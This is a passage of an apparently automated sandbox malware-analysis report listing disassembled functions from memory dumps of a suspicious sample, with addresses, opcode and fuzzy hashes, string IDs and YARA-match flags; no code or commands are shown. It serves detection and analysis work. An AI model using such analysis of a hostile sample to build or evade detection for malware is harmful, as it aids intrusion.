                                                                                                                                                                                                                                                          • Opcode ID: 23cae88c1f738cc6ba2b498dbaf025c6893f717e4732141eb56e127dbc4aeec8
                                                                                                                                                                                                                                                          • Instruction ID: b5445966682d4bce51eeb82d58a9ef2afe1a37bbb8b7dea862fda5730c19d00d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23cae88c1f738cc6ba2b498dbaf025c6893f717e4732141eb56e127dbc4aeec8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A128327093114FD718DF28C8A166BB7E2FB95314F1A843EE996C7751D736E80A8782
                                                                                                                                                                                                                                                          Function 0043F5E0 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-3019521637
                                                                                                                                                                                                                                                          • Opcode ID: fa0d1dbce1a23fbc74967c61ce0e7e6dda5e1035aa80ce491c1cbcb6fe002f0c
                                                                                                                                                                                                                                                          • Instruction ID: 6aed45fb233aa2c4fcd704149bf514c963fdf9759b22d2805e031f74d6e47680
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0d1dbce1a23fbc74967c61ce0e7e6dda5e1035aa80ce491c1cbcb6fe002f0c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FA11632A183115FC718DF28C89166BB7E2EB99314F19983EE8D5C7351D639EC0A8786
                                                                                                                                                                                                                                                          Function 00414F1E Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: rt
                                                                                                                                                                                                                                                          • API String ID: 0-702342736
                                                                                                                                                                                                                                                          • Opcode ID: 96955da5e24119577bef1d16513d434ecf30bcbd4f9f4d61d22251255e7bbb69
                                                                                                                                                                                                                                                          • Instruction ID: 0dc673b11f2f29cf9410cafdc44ae5b0865e538447e6119a8d8e6fbf35fadf0c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96955da5e24119577bef1d16513d434ecf30bcbd4f9f4d61d22251255e7bbb69
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFB11676908351CBC720CF29C8807AB77E1EFC5364F198A6EE8C98B351E7349942CB56
                                                                                                                                                                                                                                                          Function 00416603 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: *iA
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2139077580
                                                                                                                                                                                                                                                          • Opcode ID: 14f9abbb0dd42c412e929981e749cd9f1ec22b6100c6e352dcc535541c924817
                                                                                                                                                                                                                                                          • Instruction ID: 6e94b3fcf232f5d03b146c20a53fd0e815a3357b0506236d01a4d6b9f375cd80
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14f9abbb0dd42c412e929981e749cd9f1ec22b6100c6e352dcc535541c924817
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F7104366452118BD728DF14C8927BBB393FBC9318F1A553E88D957296C738DC42CB89
                                                                                                                                                                                                                                                          Function 02476107 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                          • Opcode ID: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction ID: a6bb3cadc1c1f50efd52203a6c2b27dcbaf93ae1b0c6510fd83965bb19eb5903
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28B15A705087819FD321CF18C98465BFBE5AFA9304F484E2DE5E997342D631E918CBA7
                                                                                                                                                                                                                                                          Function 00405EA0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                          • Opcode ID: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction ID: a478b9cc30ed764529248bf8faf02e780253ee7d6c10264c25d16e611a95a898
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B138712097819FD321DF18C88061BFBE0AFA9704F444A6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                          Function 0249BBE7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction ID: 727f4a2fe62f4a3c7a5759466ec0683452c2c5dad0eef83429f19872382405a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB71D332A083654BDF24CE2DE48031FBBE6EBC5718F19892EE5949B391D7359C46C782
                                                                                                                                                                                                                                                          Function 0042B980 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction ID: c4d9b42fc58f09a600c35257a89653f03652f6e6775d652d055d3af208aaf9ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6671D332B083254BD724CE29E48032BBBE2EBC5710F99C52FE4949B395D7389D4587CA
                                                                                                                                                                                                                                                          Function 0248CD8D Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: +
                                                                                                                                                                                                                                                          • API String ID: 0-574889464
                                                                                                                                                                                                                                                          • Opcode ID: b0fe1e084bfa776934ec890522000dd81f3ca0d79d61515cd075c0078fed0f1c
                                                                                                                                                                                                                                                          • Instruction ID: 6c9b66f3ed59470f856355df1e4d19b01ba46d9a3b4a8aff6cd736fb83055372
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0fe1e084bfa776934ec890522000dd81f3ca0d79d61515cd075c0078fed0f1c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F71AAB255C3909FD304EF65C89196FBFE2EB82204F48886CE1D59B311D63A8609DB97
                                                                                                                                                                                                                                                          Function 02485185 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: rt
                                                                                                                                                                                                                                                          • API String ID: 0-702342736
                                                                                                                                                                                                                                                          • Opcode ID: b3c739285426b182c49243b50139ef0afb5c4c44dfbc0fbbface3e97e13e158b
                                                                                                                                                                                                                                                          • Instruction ID: b237badb12a382d7a1195034a46c3382f9449a87a17cdd3f6a5581cfe5666e15
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3c739285426b182c49243b50139ef0afb5c4c44dfbc0fbbface3e97e13e158b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E571EE715183218BC724DF28C89066FB7F2EFC4754F4A8A5EE8C58B364E7B09902CB46
                                                                                                                                                                                                                                                          Function 0248B5C7 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _
                                                                                                                                                                                                                                                          • API String ID: 0-701932520
                                                                                                                                                                                                                                                          • Opcode ID: 860b7b0a3b2a3b631b4a1e805e6d132f1054dbf297f53b1e233929b4f662fe50
                                                                                                                                                                                                                                                          • Instruction ID: 1940eb75d87f4c5818835a9d612ebb1ca7bbd8f4cafe75c6f3ead8fe03827909
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 860b7b0a3b2a3b631b4a1e805e6d132f1054dbf297f53b1e233929b4f662fe50
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D710A2560469109D72CDF7484927377AE69F4430CB1991AFC965CFFABFA38C5038749
                                                                                                                                                                                                                                                          Function 0041B360 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _
                                                                                                                                                                                                                                                          • API String ID: 0-701932520
                                                                                                                                                                                                                                                          • Opcode ID: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
                                                                                                                                                                                                                                                          • Instruction ID: 91adedf6748a9dca2f1a78b1e507b8d61ea5c2b795734500ece8cd71c55922e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C271F85520469149D72CDF748893337BAE69F84308B2891BFD955CFBA7FA38C1438789
                                                                                                                                                                                                                                                          Function 0249C536 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: x^T:
                                                                                                                                                                                                                                                          • API String ID: 0-4046853431
                                                                                                                                                                                                                                                          • Opcode ID: 2fba3cff2e712456624dfaec6a58e9274202b5be26e54dad0cca218db8944b39
                                                                                                                                                                                                                                                          • Instruction ID: bca40312d9828f1e9db31b2dae59d3f07c01690887fd588e16edcd0bf8627fd7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fba3cff2e712456624dfaec6a58e9274202b5be26e54dad0cca218db8944b39
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF5105B1A0C3919FE7218B29C8A077BBFD1AFE7600F18989EE5C587341D7368905CB52
                                                                                                                                                                                                                                                          Function 0042C2CF Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: x^T:
                                                                                                                                                                                                                                                          • API String ID: 0-4046853431
                                                                                                                                                                                                                                                          • Opcode ID: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
                                                                                                                                                                                                                                                          • Instruction ID: 89561afeee3bb8202773f312476c0e81b73573d3d24e9526409a401e0603a0db
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C5128B46083A19BD321DB29D4A077BBBD1AFE7304F58885EE8C687341D6394905CB56
                                                                                                                                                                                                                                                          Function 024883DD Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: DBCD
                                                                                                                                                                                                                                                          • API String ID: 0-3972649111
                                                                                                                                                                                                                                                          • Opcode ID: 1da4b6897d511e356b1ebc23eec36a16c5eae396d3714c4eee6a91f3ccd77571
                                                                                                                                                                                                                                                          • Instruction ID: 1042aa6a34f86fc71127e435c7ce4cada2dc7c237918be096d0062c3a21733c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1da4b6897d511e356b1ebc23eec36a16c5eae396d3714c4eee6a91f3ccd77571
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD512B366182218FD7249B28C821BAFB7D3FBC5718F59453ED989D7282D7359802CB85
                                                                                                                                                                                                                                                          Function 00418176 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: DBCD
                                                                                                                                                                                                                                                          • API String ID: 2994545307-3972649111
                                                                                                                                                                                                                                                          • Opcode ID: 91d37935f36f46556a6b50f0f3136ee6619ea6db3f6409a747e5bbc80fb58e1a
                                                                                                                                                                                                                                                          • Instruction ID: 244c48801a6beffa120859c347b683f921f31d654a72ffce60c91e75d6a5c392
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91d37935f36f46556a6b50f0f3136ee6619ea6db3f6409a747e5bbc80fb58e1a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D513C366182118FD7248B28CC11BEBB7D2FBC5714F19453DC9D9D3292DB359842CB89
                                                                                                                                                                                                                                                          Function 02479D28 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: <=
                                                                                                                                                                                                                                                          • API String ID: 0-1782720273
                                                                                                                                                                                                                                                          • Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction ID: 87a174ff6a29080b9b9f81a1d6c0cff6f0616dad54929603c1f4ab930b266dfb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C35159B6E513684BDB14CFB9C8813DEBA32EB89314F0982A9C844B7744E73489458FC1
                                                                                                                                                                                                                                                          Function 00409AC1 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: <=
                                                                                                                                                                                                                                                          • API String ID: 0-1782720273
                                                                                                                                                                                                                                                          • Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction ID: c36e57fc54e8ebb91c1d5de0612bd1b6b956f574d134e83768c4160145cd7853
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A5139B6E513684BDB14CFB9D8812DEBA32FB89310F0982A9D844B7344E7348D458FC5
                                                                                                                                                                                                                                                          Function 0247EF47 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                          • Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction ID: 0939e4d40fc5d93fcb56570d6291fee90fbaea70999a75f9262ea3a47a939cbe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51CF3261C3908BD725AB7885413EFBBE5ABD6310F094E2FD8E987382D6748546CB43
                                                                                                                                                                                                                                                          Function 0040ECE0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                          • Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction ID: b490a7b8e69dba0a299ff7ef51fd341b042986cf65b0f910d3ddf594bd78af48
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF51CF3260C3908BD7259B3984912EFBBE5ABC6310F194E3EE4D9973C2D6388542D787
                                                                                                                                                                                                                                                          Function 0043D450 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ul
                                                                                                                                                                                                                                                          • API String ID: 0-4068291676
                                                                                                                                                                                                                                                          • Opcode ID: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
                                                                                                                                                                                                                                                          • Instruction ID: 162c06210579af30b91d2e802b6b39d5a7fb57fbd88dc5fca12273f2b30ca4e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66316032B086501BC70CDA2888A257BB7E29BDE319F19D13ED895C73D2D538DD068744
                                                                                                                                                                                                                                                          Function 024AEDB7 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
